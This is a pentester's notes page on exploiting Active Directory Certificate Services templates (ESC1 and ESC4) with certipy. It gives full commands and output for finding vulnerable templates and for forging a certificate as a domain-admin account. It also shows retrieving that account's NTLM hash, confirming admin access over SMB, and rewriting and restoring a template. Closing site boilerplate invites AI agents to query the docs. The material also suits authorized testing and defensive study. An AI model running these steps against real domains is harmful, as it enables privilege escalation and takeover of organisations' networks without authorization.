# ADCS ### Identify templates ```bash $ certipy find -username 'user@domain.local' -password '[REDACTED]' -vulnerable -stdout [...] [*] Enumeration output: Certificate Templates 1 Template Name : VPNCert Display Name : VPN Cert Certificate Authorities : dc-root-ca Enabled : True [...] Permissions Enrollment Permissions Enrollment Rights : DOMAIN.LOCAL\Domain Admins DOMAIN.LOCAL\Domain Users DOMAIN.LOCAL\Enterprise Admins DOMAIN.LOCAL\Authenticated Users Object Control Permissions Owner : S-1-5-21-XXXXXXXX-YYYYYYYYYY-ZZZZZZZZZZ-RID Write Owner Principals : DOMAIN.LOCAL\Authenticated Users [...] Write Dacl Principals : DOMAIN.LOCAL\Authenticated Users [...] Write Property Principals : DOMAIN.LOCAL\Authenticated Users [...] [!] Vulnerabilities ESC1 : 'DOMAIN.LOCAL\\Domain Users' and 'DOMAIN.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication ESC4 : 'DOMAIN.LOCAL\\Authenticated Users' has dangerous permissions ``` *** ## ESC1 ### Request new certificate For a easy win find a user that's a member of `Domain Admins` group and is not configured as a "Protected User". Using BloodHound the user `SERVICEACCOUNT@DOMAIN.LOCAL` meets these requirements. ```bash $ certipy req -username 'user@domain.local' -password '[REDACTED]' -ca dc-root-ca -target dc.domain.local -template VPNCert -upn SERVICEACCOUNT@DOMAIN.LOCAL -sid 'S-1-5-21-XXXXXXXX-YYYYYYYYYY-ZZZZZZZZZZ-RID' -debug [...] [*] Got certificate with UPN 'SERVICEACCOUNT@DOMAIN.LOCAL' [*] Certificate object SID is 'S-1-5-21-XXXXXXXX-YYYYYYYYYY-ZZZZZZZZZZ-RID' [*] Saved certificate and private key to 'serviceaccount.pfx' ``` If you encounter any errors when requesting a new certificate see [Troubleshooting](#troubleshooting) below. ### Verify certificate After successfully requesting a certificate for `SERVICEACCOUNT@DOMAIN.LOCAL` verify authentication and privileges. ```bash $ certipy auth -pfx serviceaccount.pfx [...] [*] Got hash for 'serviceaccount@domain.local': XXXXXXXXXXXXXXXXXXXXXXX:[REDACTED] $ nxc smb dc.domain.local -U SERVICEACCOUNT -H XXXXXXXXXXXXXXXXXXXXXXX:[REDACTED] -d domain.local --shares [...] SMB 10.1.1.1 445 DC [+] domain.local\SERVICEACCOUNT:[REDACTED] (Pwn3d!) ``` *** ## ESC4 ### Download template In order to restore the certificate template once exploited, download the certificate with the `-save-old` flag. `Certipy` will automatically modify the vulnerable ESC4 template to ESC1. ```bash $ certipy template -username 'user@domain.local' -password '[REDACTED]' -template VPNCert -save-old -debug [...] [*] Saved old configuration for 'VPNCert' to 'VPNCert.json' [*] Updating certificate template 'VPNCert' [...] [*] Successfully updated 'VPNCert' ``` ### Verify templates Verify that the modifications we're correct and the template is now also vulnerable to ESC1. ```bash $ certipy find -username 'user@domain.local' -password '[REDACTED]' -vulnerable -stdout [...] [*] Enumeration output: Certificate Templates 1 Template Name : VPNCert Display Name : VPN Cert Certificate Authorities : dc-root-ca Enabled : True [...] Permissions Enrollment Permissions Enrollment Rights : DOMAIN.LOCAL\Domain Admins DOMAIN.LOCAL\Domain Users DOMAIN.LOCAL\Enterprise Admins DOMAIN.LOCAL\Authenticated Users Object Control Permissions Owner : S-1-5-21-XXXXXXXX-YYYYYYYYYY-ZZZZZZZZZZ-RID Write Owner Principals : DOMAIN.LOCAL\Authenticated Users [...] Write Dacl Principals : DOMAIN.LOCAL\Authenticated Users [...] Write Property Principals : DOMAIN.LOCAL\Authenticated Users [...] [!] Vulnerabilities ESC1 : 'DOMAIN.LOCAL\\Domain Users' and 'DOMAIN.LOCAL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication ESC4 : 'DOMAIN.LOCAL\\Authenticated Users' has dangerous permissions ``` With the template also being vulnerable to ESC1, see [Request new certificate](#request-new-certificate) in the ESC1 section above. ### Restore template Once exploited through ESC1 restore the template to it's original state. ```bash $ certipy template -username 'user@domain.local' -password '[REDACTED]' -template VPNCert -configuration VPNCert.json -debug [...] [+] MODIFY_REPLACE: [+] pKICriticalExtensions: ... [+] msPKI-Entrollment-Flag: ... [+] msPKI-Certificate-Name-Flag: ... [*] Successfully updated 'VPNCert' ``` *** ## Troubleshooting ### Certificate request not supported (or similar) If we're not able to request a new certificate and encounter the error "certificate request not supported", or similar, it might be a mismatch in the template when automatically modified ESC4 to ESC1. To find the mismatching values setup a lab environment with the same vulnerability and compare the vulnerable certificate (VPNCert) to your lab environment vulnerable certificate. Make modifications accordingly and upload the new, modified, template `modified.json`. ```bash $ cp VPNCert.json modified.json $ certipy template -username 'user@domain.local' -password '[REDACTED]' -template VPNCert -configuration modified.json -debug [...] [+] MODIFY_REPLACE: [+] pKICriticalExtensions: ... [+] msPKI-Entrollment-Flag: ... [+] msPKI-Certificate-Name-Flag: ... [*] Successfully updated 'VPNCert' ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xpthree.gitbook.io/notes/active-directory/adcs.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.